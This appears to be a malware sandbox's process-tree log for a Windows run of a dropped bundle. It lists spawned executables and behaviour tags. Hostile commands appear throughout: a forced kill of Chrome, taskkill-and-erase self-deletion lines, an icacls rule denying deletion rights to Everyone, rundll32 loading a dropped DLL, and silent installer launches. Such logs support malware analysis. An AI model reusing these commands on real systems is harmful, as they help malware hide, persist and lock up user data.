C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵
- Modifies system certificate store
PID:820
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3288
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3472
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3580
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3760
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3884
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3980
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3280
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3384
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3568
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2632
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3168
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3880
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2244
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3128
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2908
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4196
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4268
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4340
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4424
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4520
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4584
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4716
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4768
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4860
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4940
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:1808
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2644
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4488
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4868
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:1156
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:5112
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4272
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4748
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:2964
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11e4e580f2e8141a3.exe2⤵PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue118f55232e4.exeTue118f55232e4.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:820 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:2804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:2904
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue1109eec571ac.exeTue1109eec571ac.exe /mixone1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1044 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue1109eec571ac.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue1109eec571ac.exe" & exit2⤵PID:2600
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue1109eec571ac.exe" /f3⤵
- Kills process with taskkill
PID:2656
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-OS2C7.tmp\Tue11b9d76a96506.tmp"C:\Users\Admin\AppData\Local\Temp\is-OS2C7.tmp\Tue11b9d76a96506.tmp" /SL5="$50136,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11b9d76a96506.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:660 -
C:\Users\Admin\AppData\Local\Temp\is-OV4CH.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-OV4CH.tmp\46807GHF____.exe" /S /UID=burnerch22⤵PID:2452
-
C:\Program Files\Microsoft Office\LKKOFUYJZZ\ultramediaburner.exe"C:\Program Files\Microsoft Office\LKKOFUYJZZ\ultramediaburner.exe" /VERYSILENT3⤵PID:2736
-
-
C:\Users\Admin\AppData\Local\Temp\23-b1aec-568-a1a9a-f8b03513bdcc8\Mufomereshi.exe"C:\Users\Admin\AppData\Local\Temp\23-b1aec-568-a1a9a-f8b03513bdcc8\Mufomereshi.exe"3⤵PID:3096
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:1148
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1148 CREDAT:275457 /prefetch:25⤵PID:4468
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1148 CREDAT:537610 /prefetch:25⤵PID:4792
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:4984
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4984 CREDAT:275457 /prefetch:25⤵PID:6892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\83-76fe9-307-f7db7-e2fd7a2d9820e\Raralylagae.exe"C:\Users\Admin\AppData\Local\Temp\83-76fe9-307-f7db7-e2fd7a2d9820e\Raralylagae.exe"3⤵PID:3148
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tb5sx2gd.syl\GcleanerEU.exe /eufive & exit4⤵PID:6044
-
C:\Users\Admin\AppData\Local\Temp\tb5sx2gd.syl\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\tb5sx2gd.syl\GcleanerEU.exe /eufive5⤵PID:3404
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tb5sx2gd.syl\GcleanerEU.exe" & exit6⤵PID:2868
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ig03jspn.tse\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:3460
-
C:\Users\Admin\AppData\Local\Temp\ig03jspn.tse\installer.exeC:\Users\Admin\AppData\Local\Temp\ig03jspn.tse\installer.exe /qn CAMPAIGN="654"5⤵PID:4248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gqgvc5wt.kls\anyname.exe & exit4⤵PID:1132
-
C:\Users\Admin\AppData\Local\Temp\gqgvc5wt.kls\anyname.exeC:\Users\Admin\AppData\Local\Temp\gqgvc5wt.kls\anyname.exe5⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\gqgvc5wt.kls\anyname.exe"C:\Users\Admin\AppData\Local\Temp\gqgvc5wt.kls\anyname.exe" -u6⤵PID:4872
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nij3lcd0.mpc\gcleaner.exe /mixfive & exit4⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\nij3lcd0.mpc\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\nij3lcd0.mpc\gcleaner.exe /mixfive5⤵PID:6132
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nij3lcd0.mpc\gcleaner.exe" & exit6⤵PID:5360
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jbmz2wrj.wrz\autosubplayer.exe /S & exit4⤵PID:7016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11b9d76a96506.exeTue11b9d76a96506.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1852
-
C:\Users\Admin\AppData\Local\Temp\7zS4C644404\Tue11d7385a978cc.exeTue11d7385a978cc.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1788
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2528 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2548
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2204 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Alfanewfile2.exe /f1⤵
- Kills process with taskkill
PID:1876
-
C:\Users\Admin\AppData\Local\Temp\F74A.exeC:\Users\Admin\AppData\Local\Temp\F74A.exe1⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\EF0.exeC:\Users\Admin\AppData\Local\Temp\EF0.exe1⤵PID:3192
-
C:\Users\Admin\AppData\Local\Temp\AB3F.exeC:\Users\Admin\AppData\Local\Temp\AB3F.exe1⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\AB3F.exeC:\Users\Admin\AppData\Local\Temp\AB3F.exe2⤵PID:6088
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ee905017-84dc-4fce-957e-c9c3ad4a24db" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:6224
-
-
C:\Users\Admin\AppData\Local\Temp\AB3F.exe"C:\Users\Admin\AppData\Local\Temp\AB3F.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\AB3F.exe"C:\Users\Admin\AppData\Local\Temp\AB3F.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:6796
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f1⤵
- Kills process with taskkill
PID:4696
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f1⤵
- Kills process with taskkill
PID:5340
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:6748
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9199C0714EB6B6DBDE59ADA3153C8C2F C2⤵PID:6376
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:7076
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7068
-
C:\Users\Admin\AppData\Local\Temp\90CE.exeC:\Users\Admin\AppData\Local\Temp\90CE.exe1⤵PID:3008